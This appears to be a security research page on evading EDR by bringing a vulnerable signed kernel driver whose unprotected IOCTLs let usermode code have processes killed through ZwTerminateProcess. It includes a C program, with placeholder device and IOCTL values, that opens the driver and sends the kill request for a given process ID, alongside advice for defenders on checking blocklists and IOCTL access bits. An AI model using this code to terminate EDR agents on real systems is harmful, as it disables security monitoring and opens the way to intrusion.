
EDR Evasion Technique Using a Vulnerable Kernel Driver
EDR, bypass, kernel driver, vulnerability, BYOVD, malware, IOCTL, usermode, ZwTerminateProcess, cybersecurity, PoC
The author describes a vulnerability found during malware research that fits the Bring Your Own Vulnerable Driver (BYOVD) pattern: a threat actor loads a legitimately signed but vulnerable kernel driver and abuses it to disable EDR products. The driver in question exposes IOCTLs with no caller validation, so a usermode application that opens the device can pass a process ID and have the driver call ZwTerminateProcess from kernel mode, killing targeted processes such as EDR agents that usermode code lacks the rights to terminate. Although the issue is already known, the driver is still not blocked by Microsoft (for example through its vulnerable driver blocklist), so defenders should verify for themselves whether it is allowed to load on their systems rather than assume it is covered. A proof of concept (PoC) is available on GitHub.
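The usermode half of that primitive looks like the following. This is an added example written for this page, not the author's GitHub PoC: the device path, the IOCTL function code and the one-field request layout are hypothetical placeholders for the values one would recover by reversing the real driver, and the helper names (ctl_code, ioctl_required_access, build_kill_request, send_kill_ioctl) are this example's own. The IOCTL helpers are portable; the Win32 device calls are compiled only on Windows.

```c
/*
 * Added example (not the article's PoC): usermode side of a BYOVD process-kill
 * primitive. HYPO_* values are assumptions standing in for the real driver's
 * device name, IOCTL code and input layout; substitute the recovered values.
 */
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#ifdef _WIN32
#include <windows.h>
#endif

/* Portable copies of the Windows I/O method/access constants. */
#define IOCTL_METHOD_BUFFERED   0u
#define IOCTL_FILE_ANY_ACCESS   0u
#define IOCTL_FILE_READ_ACCESS  1u
#define IOCTL_FILE_WRITE_ACCESS 2u

/* Same bit layout as the WDK CTL_CODE macro:
   DeviceType<<16 | RequiredAccess<<14 | Function<<2 | Method */
uint32_t ctl_code(uint32_t device_type, uint32_t function,
                  uint32_t method, uint32_t access)
{
    return (device_type << 16) | (access << 14) | (function << 2) | method;
}

/* RequiredAccess bits of an IOCTL code. The I/O manager checks these against
   the access the handle was opened with, so a code built with FILE_ANY_ACCESS
   can be sent over any handle the device's ACL lets the caller open. That is
   the first thing to check when triaging an exposed IOCTL. */
uint32_t ioctl_required_access(uint32_t code)
{
    return (code >> 14) & 3u;
}

/* Hypothetical driver details (assumptions, not from the article). */
#define HYPO_DEVICE_TYPE 0x8000u   /* FILE_DEVICE_UNKNOWN, usual for 3rd-party drivers */
#define HYPO_FUNCTION    0x800u    /* vendor-defined function codes start at 0x800 */
#define HYPO_DEVICE_PATH "\\\\.\\HypotheticalVulnDrv"
#define HYPO_IOCTL_KILL  ctl_code(HYPO_DEVICE_TYPE, HYPO_FUNCTION, \
                                  IOCTL_METHOD_BUFFERED, IOCTL_FILE_ANY_ACCESS)

/* Input buffer the hypothetical driver forwards to ZwTerminateProcess. */
struct kill_request {
    uint32_t pid;
};

/* Pack the request; returns bytes written, 0 if pid or buffer is unusable. */
size_t build_kill_request(uint32_t pid, void *out, size_t cap)
{
    if (pid == 0 || out == NULL || cap < sizeof(struct kill_request))
        return 0;
    struct kill_request req;
    req.pid = pid;
    memcpy(out, &req, sizeof req);
    return sizeof req;
}

#ifdef _WIN32
/* Open the device and send the kill IOCTL. Returns 0 on success, else a
   Win32 error code (ERROR_FILE_NOT_FOUND means the driver is not loaded). */
DWORD send_kill_ioctl(uint32_t pid)
{
    struct kill_request req;
    size_t len = build_kill_request(pid, &req, sizeof req);
    if (len == 0)
        return ERROR_INVALID_PARAMETER;

    HANDLE h = CreateFileA(HYPO_DEVICE_PATH, GENERIC_READ | GENERIC_WRITE,
                           0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
    if (h == INVALID_HANDLE_VALUE)
        return GetLastError();

    DWORD returned = 0;
    BOOL ok = DeviceIoControl(h, HYPO_IOCTL_KILL, &req, (DWORD)len,
                              NULL, 0, &returned, NULL);
    DWORD err = ok ? ERROR_SUCCESS : GetLastError();
    CloseHandle(h);
    return err;
}
#endif

int main(int argc, char **argv)
{
    printf("hypothetical kill IOCTL = 0x%08X (required access bits = %u)\n",
           HYPO_IOCTL_KILL, ioctl_required_access(HYPO_IOCTL_KILL));
#ifdef _WIN32
    if (argc != 2) {
        fprintf(stderr, "usage: %s <pid>\n", argv[0]);
        return 2;
    }
    uint32_t pid = (uint32_t)strtoul(argv[1], NULL, 10);
    DWORD err = send_kill_ioctl(pid);
    printf("DeviceIoControl for pid %u -> %s (error %lu)\n",
           pid, err == ERROR_SUCCESS ? "sent" : "failed", (unsigned long)err);
    return err == ERROR_SUCCESS ? 0 : 1;
#else
    (void)argc; (void)argv;
    puts("Win32 device calls are only compiled on Windows.");
    return 0;
#endif
}
```

Two points the example makes explicit: nothing in the usermode path is privileged once the driver is loaded, because the driver does the termination from kernel mode, and the only gates between the caller and ZwTerminateProcess are the device object's ACL and the RequiredAccess bits encoded in the IOCTL code. A driver that creates its device with a permissive security descriptor and defines its IOCTLs with FILE_ANY_ACCESS leaves both gates open, which is the condition the page describes as "unprotected IOCTLs".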